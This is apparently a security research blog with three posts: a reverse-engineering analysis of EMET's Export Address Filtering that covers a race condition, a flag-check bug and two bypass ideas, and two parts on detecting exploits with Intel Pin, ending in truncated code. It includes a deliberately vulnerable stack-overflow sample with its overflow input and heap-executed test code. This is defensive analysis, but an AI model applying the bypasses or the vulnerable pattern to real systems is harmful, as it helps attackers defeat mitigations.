Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Thursday, March 20, 2014

Reversing EMET's EAF (and a couple of curious findings...)

EMET is a very useful tool that allows a user to configure the security protections against some common, well known, attack vectors. In this blog entry I will focus on EAF, pointing out some issues that affect the current implementation. EAF stands for Export Address Filtering and, as the name suggests, this protection controls the access to the Export Table of a couple of major system DLLs, in order to make it more difficult for an attacker to obtain the addresses of the APIs if the request is performed from outside executable modules (e.g. from a shellcode running from the stack, or from the heap).

Here is a snapshot of the EMET configuration interface, where you can see all the available protections (including EAF):




EMET uses the Shims engine to inject its module inside all the protected processes: if you inspect a process (e.g. with Process Explorer) on which EMET is active, you will notice the presence of EMET.dll, which means that at least one protection is active for that process. So, EMET operates from the inside of the process in order to enable its protections, but, despite this "invasive" approach, I haven't noticed problems in performance or functionality. Some compatibility problems do exist (given the tricky nature of some protections), but they are well documented for all the most common software.

Let's start focusing on EAF itself. First, EMET protects EMET.dll by calling the GetModuleHandleEx API: if as its parameters you specify the flags GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS and GET_MODULE_HANDLE_EX_FLAG_PIN, and an address inside the EMET.dll itself, as a result, the DLL will stay loaded until the process is terminated (no matter how many times FreeLibrary is called).

Then, EMET reads the Export Table of kernel32.dll and of ntdll.dll (the two DLLs being protected) and, in both cases, saves the AddressOfFunctions field (from the IMAGE_EXPORT_DIRECTORY structure) that contains the address at which all the exported APIs addresses are located. Having done that, EMET installs a global Exception Handler by calling the AddVectoredExceptionHandler API, which will be used to filter all the exceptions that occur when a hardware breakpoint is hit. I will describe this Exception Handler routine later.

Now EMET proceeds in activating the protection by forking the execution into two threads.

The main one uses the CreateToolhelp32Snapshot/Thread32First/Thread32Next APIs to get a list of all the running threads of the current process and saves them in an array:

.text:0005486D                 push    0FFFFFFFFh      ; dwMilliseconds
.text:0005486F                 push    array_mutex     ; hHandle
.text:00054875                 call    ds:WaitForSingleObject
.text:0005487B                 mov     eax, thread_count
.text:00054880                 cmp     eax, 256
.text:00054885                 jnb     short loc_54897
.text:00054887                 mov     ecx, [ebp+thread_id]
.text:0005488A                 mov     tid_array[eax*4], ecx
.text:00054891                 inc     thread_count


The second one retrieves all the threads from the array and activates the hardware breakpoints on them in order to protect the AddressOfFunctions fields (one per DLL) mentioned above.
Such array has a hardcoded size of 256 DWORDS, but don't be disappointed: this is only a temporary buffer where the new threads are added until they are processed, and then removed, by the protector thread. 
Moreover, EMET uses a mutex (actually saved as the first element of the array) to synchronize the access to the thread list, thus ensuring that all the newly added threads are processed before the array fills up with 256 of them:


.text:00054906             Protector_Loop:
.text:00054906                 push    100
.text:00054908                 call    ds:Sleep
.text:0005490E                 push    0FFFFFFFFh
.text:00054910                 push    array_mutex
.text:00054916                 call    ds:WaitForSingleObject
.text:0005491C                 mov     ebx, thread_count
.text:00054922                 test    ebx, ebx
.text:00054924                 jz      short loc_5498B
  ...


Still, there is a curious race condition: there is a certain amount of time that passes between the creation of a thread, its insertion in the array and the activation of EAF in the protector thread. Due to this delay, new created threads (including the main application one) won't be protected by EAF in the initial time of their execution.



The Windows scheduler allows each thread to run only in a limited slot of time, after which the execution will be passed to other threads. In this way, in most scenarios, a new thread (including the main one) will run for some time before the execution will eventually yield to the protector thread, that will, then, activate the EAF protection. But what if this thread runs vulnerable code before the scheduler could allow the execution of the protector one? Is that possible? Well, in theory it is and, actually, this is also how I discovered the race condition in the first place. 

I created a little application that accesses the AddressOfFunctions field of the kernel32.dll Export Table from a shellcode loaded outside executable modules (in the heap), prints it and then quits. I also activated EAF from the EMET tool. My application should have crashed, but instead it worked without any problem and I couldn't understand why. Moreover, I made my application print the hardware debug registers, and I noticed that the hardware breakpoints were never set. Debugging EMET.dll I discovered the race condition: so, I added a Sleep() in the entry point of my test application to give the EAF protector thread the time to run, and lo and behold, my application crashed as expected when the AddressOfFunctions field was read from the malicious shellcode. 
The same holds if I do an analogous test on new created threads, not just the main one: there is a small window of vulnerability during the beginning of every thread, but it's very unlikely that an attacker will ever take advantage of it.

Here is the source code of my test application:

 #include <Windows.h>  
 #include <stdio.h>  
   
 DWORD getApiAddress(void)  
 {  
      DWORD KernelImagebase, *pNames, *pAddresses, pCreateFile;  
      IMAGE_DOS_HEADER *pMZ;  
      IMAGE_NT_HEADERS *pPE;  
      IMAGE_EXPORT_DIRECTORY *pExpDir;  
      CHAR *currentName;  
   
      KernelImagebase = (DWORD)LoadLibrary(L"Kernel32.dll");  
   
      pMZ = (IMAGE_DOS_HEADER*)KernelImagebase;  
      pPE = (IMAGE_NT_HEADERS*)(KernelImagebase + pMZ->e_lfanew);  
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(KernelImagebase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);  
   
      pNames = (DWORD*)(KernelImagebase + pExpDir->AddressOfNames);  
      pAddresses = (DWORD*)(KernelImagebase + pExpDir->AddressOfFunctions);  
      for(int i = 0; i < pExpDir->NumberOfNames; i++)  
      {  
           currentName = (CHAR*)(KernelImagebase + pNames[i]);  
           if(lstrcmpA(currentName, "CreateFileA") == 0)  
           {  
                pCreateFile = (DWORD)(KernelImagebase + pAddresses[i]);  
           }  
      }  
   
      return pCreateFile;  
 }  
   
 void main(void)  
 {  
      DWORD apiAddress;  
   
      Sleep(2000);          // this delay will fix the race condition!  
   
      // print the debug registers  
   
      CONTEXT myContext;  
      memset(&myContext, 0, sizeof(myContext));  
      myContext.ContextFlags = CONTEXT_ALL;  
      HANDLE hThread = GetCurrentThread();  
      if(!GetThreadContext(hThread, &myContext)){  
           printf("cannot get thread context \n");  
      }  
      printf("main D0: %08x, D1: %08x, D2: %08x, D3: %08x\n",   
           myContext.Dr0, myContext.Dr1, myContext.Dr2, myContext.Dr3);  
   
      // test1: checking the export table of kernel32.dll from this executable module  
   
      apiAddress = getApiAddress();  
      printf("Test1 CreateFileA function: %08x \n", apiAddress);  
   
      // test2: checking the export table ok kernel32.dll from the heap  
   
      DWORD functionSize, pMain, pgetApiAddress;  
   
      pMain = DWORD(&main);  
      pgetApiAddress = DWORD(&getApiAddress);  
      functionSize = pMain - pgetApiAddress;  
   
      BYTE *shellcode = (BYTE*)malloc(functionSize);  
      memcpy(shellcode, (BYTE*)pgetApiAddress, functionSize);  
   
      __asm  
      {  
           mov  ebx, shellcode  
           call  ebx  
           mov  apiAddress, eax  
      }  
   
      free(shellcode);  
   
      printf("Test2 CreateFileA function: %08x \n", apiAddress);  
   
      getchar();  
 }  


Note: when you compile this code (I used Visual Studio), you must disable all the optimizations to avoid changes to the code layout, and also remove DEP from the linker options.

"test1" retrives the address of the CreateFileA API from inside the executable module; "test2" does the same from the heap.

If you don't add the Sleep(2000) in the main() function, you will get this output:

main D0: 00000000, D1: 00000000, D2: 00000000, D3: 00000000
Test1 CreateFileA function: 7649bde6
Test2 CreateFileA function: 7649bde6


Notice how the debug registers are all set to zero and both tests ran successfully.
Otherwise if you keep the Sleep(2000) in the code, you will get:

main D0: 7651fa5c, D1: 77e40204, D2: 00000000, D3: 00000000
Test1 CreateFileA function: 7649bde6


As you can see, the debug registers are set and the EAF protection is active, therefore the application crashes when running the second test:



I think that a better usage of the synchronization objects may avoid this race condition: for instance, implementing these routines using a critical section and two events would have probably been a safer alternative.


In this implementation, the main thread and every additional thread that is created, will add itself to the thread array (processed by the protector thread). The code to do this will be inside a critical section object: in this way, we ensure that if multiple threads are created, only one at the time will run the code to add itself to the threads array. Also, the critical section is a cheap synchronization object compared to the mutex used in the EMET implementation.
The protector thread is constantly waiting on "event 1", which is an event object: it is thus not wasting CPU cycles looping continuously, like the current EMET implementation does, it will only spawn and use the CPU when a new thread is created. In fact, a new thread will add itself to the threads array, and then will signal "event 1", waking up the protector thread. The new thread will then stop and wait for "event 2". Meanwhile, the protector thread has the time to process the threads array, and because of the structure of the code, it is sure that no other thread will be modifying it. Once EAF is activated, the protector thread signals "event 2" and then goes back to wait for "event 1". The signaled "event 2" will wake up the new thread, which will then continue its normal execution.

This implementation has several advantages respect the one from EMET:

  • The protector thread only uses resources when it has to.
  • Only one thread at the time modifies the thread array, avoiding the need for an array in the first place: the code could just use a single variable, avoiding an arbitrary size of 256, and also avoids the rare but possible condition of the array filling up before the protector thread spawns.
  • The new thread is guaranteed to be protected when it reaches the user code, avoiding the small window of vulnerability described in EMET's implementation.
I have not tested this code, but it should work and should not suffer from deadlocks. This could also be implemented in other ways, but you get the point I'm trying to make: you can use proper synchronization to make the code cleaner, more efficient and more elegant.

Now let's go back to the second thread: how exactly is EAF implemented? Let's recall that the hardware breakpoints are set by using the CPU debug registers.
EMET looks for every entry in the threads list, then successively opens and suspends each thread in order to modify their contexts using the SetThreadContext API.

As you can see from the image above, the AddressOfFunctions fields of the Export Tables of kernel32.dll and ntdll.dll are used to fill the DR0 and DR1 registers, while some appropriate flags are set in DR7.

These flags are:
  • L0, L1 used to activate the local breakpoints (meaning that they only work in the current thread);
  • LE used for backward compatibility reasons;
  • R/W0, R/W1 used to indicate if the breakpoint is set on read, write, or execute operations;
  • LEN0, LEN1 used to specify the size of the data on which the breakpoint acts.

In short: L0, L1, LE are set to 1 (which means that this flags are enabled); R/W0, R/W1 are set to 11 (which means that a breakpoint is set on data reads or writes); LEN0, LEN1 are set to 11 (referring to 4 bytes long breakpoints).
When these modifications are done, the thread is resumed and the EAF protection becomes active.

If you are interested in digging into the debug registers and how Windows handles them, I suggest you to read this article by Alex Ionescu.

At this point we have come so far that our description is almost complete, the only missing piece is the function being installed as an Exception Handler. Let's briefly recall that a function being passed as an Exception Handler must have the following prototype:
LONG CALLBACK VectoredHandler(
  _In_  PEXCEPTION_POINTERS ExceptionInfo
);

In particular, EMET accesses ExceptionInfo->ExceptionRecord->ExceptionFlags to filter the exception itself, making sure that it's a Single Step one (do remember that when an hardware breakpoint is hit the generated exception is of type Single Step). If it is, EMET disables all the active hardware breakpoints (that is, it sets to zero the L0, L1 flags in DR7). 

Then, it reads the context at the time the exception happened through ExceptionInfo->ContextRecord, and checks the four lowest bits in DR6 (B0 to B3): these bits indicate that a hardware breakpoint condition was met when a Single Step exception was raised (to distinguish it from the ones being generated when the Trap Flag is set).
Although, I'm quite sure that there's a little bug in performing this check:

.text:000546C4                 test    byte ptr [eax+CONTEXT.Dr6], 11h ; bug! 11h should be 3
.text:000546C8                 jz      short not_handled
.text:000546CA                 push    [eax+CONTEXT._Eip] ; reg_eip
.text:000546D0                 call    is_in_module
.text:000546D5                 test    eax, eax
.text:000546D7                 jnz     short not_handled
.text:000546D9                 push    edi
.text:000546DA                 push    1
.text:000546DC                 call    report_protection
.text:000546E1                 cmp     status_exploitaction, 1
.text:000546E8                 pop     ecx
.text:000546E9                 pop     ecx
.text:000546EA                 jnz     short not_handled
.text:000546EC                 push    1
.text:000546EE                 push    STATUS_STACK_BUFFER_OVERRUN
.text:000546F3                 push    dword ptr [edi+4]
.text:000546F6                 call    report_error_and_terminate
.text:000546FB not_handled:
  ...


In fact, EMET tests DR6 for 11 hex, which is 10001 in binary, corresponding to the B0 and the undocumented 5th bit that, according to the Intel's manuals, is always set to 1. I believe that this is a typo, and that the correct flag to be tested was 11 in binary (meaning 3 hex) that is both B0 and B1. 
This is not a serious issue, because DR1 is checked anyway, but it's really useless to let EMET handle a breakpoint that is not actually set. 

If one of the two hardware breakpoints was hit when the exception occurred, which may always be the case because of the buggy TEST instruction, EMET checks the value of the EIP register at that time (through ExceptionInfo->ContextRecord->EIP) to verify (using GetModuleHandleEx) if the instruction that caused the Single Step exception belonged to an executable module or not. If it didn't, the error is logged and if "status_exploitaction" is set (this variable corresponds to the "Stop on exploit/Audit only" customizable option available from the EMET's settings panel) a STATUS_STACK_BUFFER_OVERRUN is reported (through ExceptionInfo->ExceptionRecord->ExceptionCode), the exception is unhandled and the process is terminated. In all the other cases (that is if neither of the two bits in DR6 is set, or if the instruction reported in EIP did belong to an executable module, or if "status_exploitaction" isn't set) EMET disables all the bits in DR6 and activates the L0 and L1 flags in DR7 again to let the execution resume as if nothing happened.

Our journey through the EAF implementation is now over, but I would like to discuss briefly a couple of methods to bypass it. As declared by Microsoft, EAF wasn't meant as a definitive protection against unwanted access to the APIs addresses, but more as an obstacle for existing shellcodes.

One simple way to obtain such information, without any need to access the Export Table, is to use the Import Table instead. In particular, you can parse the Import Table of a DLL that is * importing * the desired API from kernel32.dll, or ntdll.dll and look for the OriginalFirstThunk and FirstThunk fields in the IMAGE_IMPORT_DESCRIPTOR structure. For example, User32.dll is loaded in almost every running process, and it imports both the LoadLibrary and GetProcAddress APIs, which are commonly used in shellcodes to get the addresses of other APIs.

Another method to bypass EAF is to use a specially crafted ROP gadget just to retrieve the AddressOfFunctions value. In this way, since you are reading the Export Table from a gadget that lies within an executable module, EMET won't detect anything suspicious and you can then find the addresses of all the needed APIs. Of course, EMET performs some security checks against ROP too, but since we need only one gadget it's not too difficult to find one that exploits the protection itself (or else, you may want to use a JOP gadget). For example, a shellcode may parse the Export Table of a module in order to find the pointer to the AddressOfFunctions field, put this pointer in the EAX register and then call a code gadget that does the following:

MOV       EAX, [EAX]
RET


This gadget is very short, it only requires three bytes of opcodes (8B 00 C3), so it should be very easy to find it inside most executable modules.

These are just two simple ideas that come to my mind, of course they are nothing new and surely you can find other ways to implement the trick. Moreover, these two methods assume that you already got rid of DEP and ASLR, which are the real pain when writing an exploit.

Note: the analysis was originally written in September 2013 for version 4.0, but it still holds for current version 4.1.



Thursday, March 21, 2013

Binary Instrumentation for Exploit Analysis Purposes (part 2)

Introduction.

This is the second part of the article about binary instrumentation for exploit analysis purposes and this time we will discuss a real pdf exploit: a Stack-based buffer overflow in CoolType.dll (CVE-2010-2883). You can retrieve it from the metasploit module exploit/windows/fileformat/adobe_cooltype_sing .

In order to bypass DEP, this exploit makes use of Heap Spraying to run its ROP shellcode. On the other hand, our goal is to come closer to the point where the vulnerability occurs, so one clever thing to do is to use Pintool to detect the ROP itself.

To do that, we can simply check if the instruction executed after a RET is located after a CALL, but be aware that performing this test alone could lead to false positives. A better test would be to control wether this check works for three times in a row, but this gives rise to some Pintool's problems that we will discuss later.
Another method to detect ROP is to control the ESP register and look for the "0c0c0c0c" value, but inspecting the register with Pin is very slow and will degrade the performance of your Pintool. So we won't implement this one.
Finally, one last check is to log the "pop ESP" instruction, that is a common ROP gadget employed right before the ROP shellcode itself.


Detecting the ROP with a Pintool.

Here is the function to detect the ROP:

#define LAST_EXECUTED 1000

ADDRINT LastExecutedBuf[LAST_EXECUTED];
UINT32 LastExecutedPos = 0;
UINT32 PreviousOpcode;
char TempString[12];

#define     PREV_OPCODE(__dist) (((UINT16*)(AddrEip - __dist))[0])

typedef struct _OPC_CHECK  
{
 UINT8 Delta;
 UINT16 Opcode;
} OPC_CHECK;

OPC_CHECK OpcCheck[] = 
{
 6, 0x15ff, 2, 0x12ff, 2, 0x11ff, 2, 0x13ff, 2, 0x17ff, 2, 0x16ff, 2, 0x10ff, 
 3, 0x55ff, 3, 0x50ff, 3, 0x51ff, 3, 0x52ff, 3, 0x53ff, 4, 0x54ff, 3, 0x55ff, 
 3, 0x56ff, 3, 0x57ff, 3, 0x59ff, 6, 0x95ff, 6, 0x97ff, 6, 0x76ff, 6, 0x96ff, 
 6, 0x94ff, 6, 0x93ff, 6, 0x92ff, 6, 0x91ff, 6, 0x90ff, 7, 0x14ff, 7, 0x94ff, 
 3, 0x14ff, 4, 0x54ff, 2, 0xd0ff, 2, 0xd1ff, 2, 0xd2ff, 2, 0xd3ff, 2, 0xd4ff, 
 2, 0xd5ff, 2, 0xd6ff, 2, 0xd7ff, 0, 0
};

char* QuickDwordToString(char *String, UINT32 Value)
{
 int i;
 UINT32 TempVal = Value;
 UINT8 TempByte;

 for(i = 0; i < 8; i++)
 {
  TempByte = (TempVal & 0xF) + 0x30;
  if(TempByte > 0x39) TempByte += 7;
  String[7-i] = TempByte;
  TempVal >>= 4;
 }

 return String;
}

VOID DetectPopEsp(ADDRINT AddrEip, UINT32 Opcode) 
{
 UINT32 i, k;

 if(PreviousOpcode == 557 &&   // int for RET
  AddrEip < 0x70000000 &&
  ((UINT8*)(AddrEip-5))[0] != 0xE8)
 {
  k = 0;
  while(OpcCheck[k].Delta != 0)
  {
   if( PREV_OPCODE(OpcCheck[k].Delta) == OpcCheck[k].Opcode)
    break;

   k++;
  }

  if(OpcCheck[k].Delta == 0)
  {
   fprintf(OutTrace, "%s RETurned here, but not after call\n", QuickDwordToString(TempString, AddrEip));
  }
 }

 if(Opcode == 486)   // int for POP
 {
  if(((UINT8*)AddrEip)[0] == 0x5C)
  {
   fprintf(OutTrace, "%s  POP ESP DETECTED!!\n", QuickDwordToString(TempString, AddrEip)); 
   fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
   // dump last executed buffer on file
   for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
   {
    fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i])); 
   }
   for(i = 0; i < LastExecutedPos; i++)
   {
    fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i])); 
   }
   fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, AddrEip)); 
   fflush(OutTrace);
  }
 }

 LastExecutedBuf[LastExecutedPos] = AddrEip;
 LastExecutedPos++;
 if(LastExecutedPos >= LAST_EXECUTED)
 {
  // circular logging
  LastExecutedPos = 0;
 }

 PreviousOpcode = Opcode;
}

Include it in the source code of the basic Pintool provided in the first part of the article and use the following line:

INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);

in the "Instruction()" function to call the "DetectEip()" function before every instruction is executed.

Also, add these lines:

UINT32 Opcode;

va_list VaList;
va_start( VaList, AddrEip);

Opcode = va_arg(VaList, UINT32);

va_end(VaList);

DetectPopEsp(AddrEip, Opcode);


in the "DetectEip()" function (where specified by the comments).

Now a brief description of what the code does. Basically, this Pintool looks for two opcodes: the one corresponding to RET (Pin code 557) and the one corresponding to POP (Pin code 486).

If a RET is encountered, the Pintool follows it and checks if the previous opcode is a CALL, looking for the E8 opcode or the ones provided in the "OpcCheck[].Opcode" array (the list may not be complete, but while testing it was reasonably accurate). In case it's not, it notifies the user with the message: "*Address* RETurned here, but not after call".

If a POP is encountered, it checks if it is a "POP ESP" and, in case it is, it notifies the user by printing "*Adress* POP ESP DETECTED!!" and dumps the last executed instructions on file.

That's it. You are finally ready to compile the Pintool and run it within Adobe Acrobat Reader to analyse the PDF exploit.


Analyzing the output

Here is an excerpt from the output produced by the Pintool:

Exception handler address: 7C91EAEC 
Starting Pintool
Loading module C:\Programmi\Adobe\Reader 9.0\Reader\AcroRd32.exe 
Main exe Base: 00400000  End: 00453FFF
Loading module C:\WINDOWS\system32\kernel32.dll 
Module Base: 7C800000 
Module end: 7C8FEFFF 
Loading module C:\WINDOWS\system32\ntdll.dll 
Module Base: 7C910000 
Module end: 7C9C5FFF 
Starting thread 0
...
0D6D8192 RETurned here, but not after call
02D43FA5 RETurned here, but not after call
22326DB0 RETurned here, but not after call
5B18174F RETurned here, but not after call
08171CF0 RETurned here, but not after call
08171D47 RETurned here, but not after call
06066EED RETurned here, but not after call
0633DE6B RETurned here, but not after call
...
4A82A714 RETurned here, but not after call
4A82A714  POP ESP DETECTED!!
Dumping list of previously executed EIPs 
0803DDC6
0803DDCA
0803DDCC
0803DDCD
...
0808B304
0808B305
0808B307
0808B308
4A80CB38
4A80CB3E
4A80CB3F
4A82A714


From the log above we can see all the modules being loaded and threads being created. Then, we notice some false positives: these are legitimate RETs, which don't return to an instruction after a CALL.
Finally, we get to the part where both checks are detected: the code returns to an instruction not located after a call and a "POP ESP" instruction is executed.

In particular, the last logged EIPs correspond to following ROP gadgets:

 4A80CB38   81C5 94070000    ADD EBP,794
 4A80CB3E   C9               LEAVE
 4A80CB3F   C3               RETN

 4A82A714   5C               POP ESP
(4A82A715   C3               RETN)


So we have located where the exploit occurs (i.e. the address "0808B308"): not bad!

Note that the last instruction reported here (the RETN between parentheses) is not logged by the Pintool because a crash happened right after its execution... but...


...Why???

As I said before, this exploit makes use of Heap Spraying. In particular, we can see it by debugging Adobe Acrobat Reader while Pin is not instrumenting it and setting a breakpoint on address "0808B308". Now, if we open the PDF exploit and leave the debugger running, we can inspect the memory when the code hits the breakpoint:





This is exactly what we were expecting: you can notice the ROP shellcode at "0c0c0c0c" and the Heap Spraying all around. On the other hand, if we debug the Adobe Acrobat Reader while Pin is instrumenting it, we obtain:




So... no ROP, nor Heap Spraying... but the blocks of memory are still allocated. Who has allocated them?
To get the answer we need to look inside the code window:



... It's Pin itself!
Pin allocates a lot of memory to perform binary instrumentation, occupying also the addresses usually employed by the Heap Spraying. This means that when the ROP shellcode is executed, it's not located where it is supposed to be and this will result in Adobe Acrobat Reader crashing.


Another problem I ran into, is that even when I modified the Pintool in order to force the exploit to work with the shellcode that was placed at a different address than 0x0C0C0C0C, the exploit still crashed.
This time I could see it run all the ROP shellcode, which allocates a block of executable memory, copies itself to it and then jumps to it.

However, this executable shellcode (not ROP) tried to decrypt (and therefore overwrite) itself causing a memory access violation and making the instrumented shellcode crash. 

I haven't investigated the problem yet, but it seems that the instrumented shellcode is placed in an area that is read only, therefore the self decryption failed when writing the decrypted bytes back to the shellcode memory. 

Sunday, March 10, 2013

Binary Instrumentation for Exploit Analysis Purposes (part 1)

Introduction.

This article is about binary instrumentation over various exploit scenarios. In particular, we are going to use Pin, a software developed by Intel, to show how this approach can help with the analysis.

Pin is employed to create dynamic program analysis tools, the so called "Pintools". Once executed, a Pintool acts almost like a virtual machine that runs the code from a target executable image and rebuilds it by adding the code you need to perform your own analysis. For example, you can: install a callback that is invoked every time a single instruction is executed; inspect registers; alter the context and so on.

Note: I've tested the whole work using Windows XP 32 bit and Visual Studio 2010.


How to compile and execute a Pintool.


The simplest way to compile a Pintool is to use the Visual Studio project provided by Intel, located in the Pin folder at: \source\tools\MyPinTool .

To run it, simply type: pin -t <your_pintool.dll> -- <application_path>.
In this way your Pintool will be executed within the application you want to test.


How to code a Pintool: a (very) short description.

A Pintool begins with a standard initialization of the Pin engine by using the "PIN_Init()" function; then, you need to register the callbacks for the events you want to handle. 
For instance, you can use:
  • "INS_AddInstrumentFunction()" to register a callback that is invoked at every executed instruction;
  • "IMG_AddInstrumentFunction()" to register a callback that notifies you every time an executable module is loaded;
  • "PIN_AddThreadStartFunction()" and "PIN_AddThreadFiniFunction()" to handle thread creation and ending.

In particular, if you register a callback with "INS_AddInstrumentFunction()", you can then use the "INS_InsertCall()" function from it and register other callbacks.
These callbacks have a special property: they can be invoked before or after an instruction is executed. Also, you can pass to them any kind of data, including the value of specific registers (the instruction pointer, for instance), memory addresses and so on.

Finally, you'll have to use "PIN_AddFiniFunction()" to register the callback that is invoked when the application quits.

Once all the callbacks are registered, you can start the instrumented program by calling "PIN_StartProgram()".

Your Pintool can filter specific conditions with an incredibly accurate resolution, but bear in mind that the performances may degrade badly depending on what kind of actions you choose to do.

As an example, let's consider again the "INS_AddInstrumentFunction()", and suppose that we are going to register a callback that logs every executed instruction to a file: if you are distracted, you might generate a file I/O for every single instruction, which is very inefficient. Another operation that will reduce your Pintool's performances, if called frequently, is the disassembler functionality.
So be careful: your instrumented application can run almost at realtime speed if your Pintool is well written, but a bad implementation may slow down your application up to the point where it will take minutes to run.


A basic Pintool.

Here is a very basic Pintool to which we will add more specific functions later.

 #include <stdio.h>  
 #include "pin.H"   
   
 namespace WINDOWS  
 {  
     #include <windows.h>  
 }  
   
 FILE * OutTrace;  
 ADDRINT ExceptionDispatcher = 0;
   
 /* ===================================================================== */  
 /* Instrumentation functions                                             */  
 /* ===================================================================== */  
   
 VOID DetectEip(ADDRINT AddrEip, ...)   
 {  
     if(AddrEip == ExceptionDispatcher)  
     {  
         fprintf(OutTrace, "%08x Exception occurred!\n", AddrEip);   
     } 

     // Here you can call the functions that we will add
     //(you should also remove the next line to avoid tracing every instruction being executed)
   
     fprintf(OutTrace, "%08x \n", AddrEip);  
 }  
   
 // Pin calls this function every time a new instruction is encountered  
 VOID Instruction(INS Ins, VOID *v)  
 {  
     // Insert a call to DetectEip before every instruction, and pass it the IP  
     INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_END);  
 }  
   
 VOID ImageLoad(IMG Img, VOID *v)  
 {  
     fprintf(OutTrace, "Loading module %s \n", IMG_Name(Img).c_str());  
     fprintf(OutTrace, "Module Base: %08x \n", IMG_LowAddress(Img));  
     fprintf(OutTrace, "Module end: %08x \n", IMG_HighAddress(Img));  
     fflush(OutTrace);  
 }  
   
 /* ===================================================================== */  
 /* Finalization function                                                 */  
 /* ===================================================================== */  
   
 // This function is called when the application exits  
 VOID Fini(INT32 code, VOID *v)  
 {  
     fprintf(OutTrace, "Terminating execution\n");  
     fflush(OutTrace);  
     fclose(OutTrace);  
 }  
   
 /* ===================================================================== */  
 /* Print Help Message                                                    */  
 /* ===================================================================== */  
   
 INT32 Usage()  
 {  
     PIN_ERROR("Init error\n");  
     return -1;  
 }  
   
 /* ===================================================================== */  
 /* Main                                                                  */  
 /* ===================================================================== */  
   
 int main(int argc, char * argv[])  
 {  
     OutTrace = fopen("itrace.txt", "wb");  
   
     WINDOWS::HMODULE hNtdll;  
     hNtdll = WINDOWS::LoadLibrary("ntdll");  
     ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");  
     fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);  
     WINDOWS::FreeLibrary(hNtdll);  
   
     // Initialize pin  
     if (PIN_Init(argc, argv))   
     {  
         Usage();  
     }  
   
     // Register Instruction to be called to instrument instructions  
     INS_AddInstrumentFunction(Instruction, 0);  
   
     // Register ImageLoad to be called at every module load  
     IMG_AddInstrumentFunction(ImageLoad, 0);  
   
     // Register Fini to be called when the application exits  
     PIN_AddFiniFunction(Fini, 0);  
     
     // Start the program, never returns  
     fprintf(OutTrace, "Starting Pintool\n");   
     PIN_StartProgram();  
   
     return 0;  
 }    

It basically logs to a file: the address of each instruction being executed; all the exceptions occurred; the name of each module being loaded, including the base and the end address.

I have also put a comment in the "DetectEip()" function, to specify where you can call the functions we will add later.


First exploit scenario: stack overflow.

As a first case study, we are going to consider a specially crafted sample:

 #include <stdio.h>  
 #include <string.h>  
   
 unsigned char Var[2] = {0xFF, 0xE4};  
   
 void GetPassword(){  
  char Password[12];  
   
  memset(Password, 0, sizeof(Password));  
  printf("Insert your password (max 12 chars):\n");  
   
  int i = -1;  
  do{  
    i++;  
    Password[i] = getchar();  
  } while (Password[i] != 0x0D && Password[i] != 0x0A);  
  Password[i] = 0;  
   
  printf("Your password is: %s \n", Password);  
 }  
   
 void main(void){  
  GetPassword();  
 }  

Before compiling and linking it (I used Visual Studio 10), be sure to disable all the security options (stack canaries, DEP, ASLR) and to set the Base Address to 0x41410000.
I know it might sound a little unreal, and in fact... it is! But don't worry, as I said before, this is just the simplest example that crossed my mind and we are going to use it as a first test. Anyway the methodology I'm proposing is very effective and we will see a real case study later.

First, we need to "exploit" this little test: I'll be quick. We can open the executable with Ollydbg and debug it until we find the "getchar" function, that grabs an input string. Then, we enter the following (in my case at least, you should check the parameters explained later if you want to be 100% sure!): "123456789abcAAAA 0AABBBBBBBBBBBBBBBBBBB" (remove the " ").

What's the meaning of it? We are going to fill all the 12 required bytes, and because of the lack of control over the size of the input, we also type:

  • "AAAA", that is the padding added by the compiler;
  • " 0AA", that corresponds to the 0x41413020 address (= "AA0 ", because of the endianness) where the "JMP ESP" instruction (= "0xFF 0xE4" as an opcode) is located --- this will overwrite the return address of the "main" function;
  • a bunch of "B", that corresponds to the "INC EDX" instruction --- this is where you will usually put the shellcode, but as a test every valid instruction will be fine!

Now that you have tested that the string I provided works also in your case, or you have built your own valid string, we are ready to analyze our first exploit scenario: a simple stack overflow. How can we detect that?
The most natural idea is to perform a check over EIP to see whether its value corresponds to a non-executable area (the stack in this case).

The Pintool maintains two variables containing the base and end address of the module being executed.
If the value of the EIP isn't in the range specified by these two addresses, Pintool accesses the modules list maintained by Pin, looking for a new executable module in which the value of EIP resides (for instance, after an API call). When such a module is found, the variables containing the base and end address are updated (making it the current module).
If the value of EIP isn't located within any of the modules, the Pintool reports it as suspicious and logs the list of the last 1000 executed values of EIP.

Here is the code to do that:

 #define LAST_EXECUTED 1000  
 ADDRINT LastExecutedBuf[LAST_EXECUTED];  
 UINT32 LastExecutedPos;
 ADDRINT CurrentModuleBase, CurrentModuleEnd;  
   
 bool IsModuleFound(ADDRINT Addr)  
 {  
     for(IMG Img = APP_ImgHead(); IMG_Valid(Img); Img = IMG_Next(Img))  
     {  
         if(Addr >= IMG_LowAddress(Img) &&  
             Addr <= IMG_HighAddress(Img))    // <=, not <  
         {  
             CurrentModuleBase = IMG_LowAddress(Img);  
             CurrentModuleEnd = IMG_HighAddress(Img);  
             return true;  
         }  
     }  
   
     return false;  
 }  
   
 void CheckEipModule(ADDRINT AddrEip)  
 {  
     int i;  
     if(! (AddrEip >= CurrentModuleBase && AddrEip < CurrentModuleEnd) )  
     {  
         if(!IsModuleFound(AddrEip))  
         {  
             // eip is no within an executable image!  
             fprintf(OutTrace, "EIP detected not within an executable module: %08x \n", AddrEip);  
             fprintf(OutTrace,"Dumping list of previously executed EIPs \n");  
             for(i = LastExecutedPos; i < LAST_EXECUTED; i++)  
             {  
                 fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);   
             }  
             for(i = 0; i < LastExecutedPos; i++)  
             {  
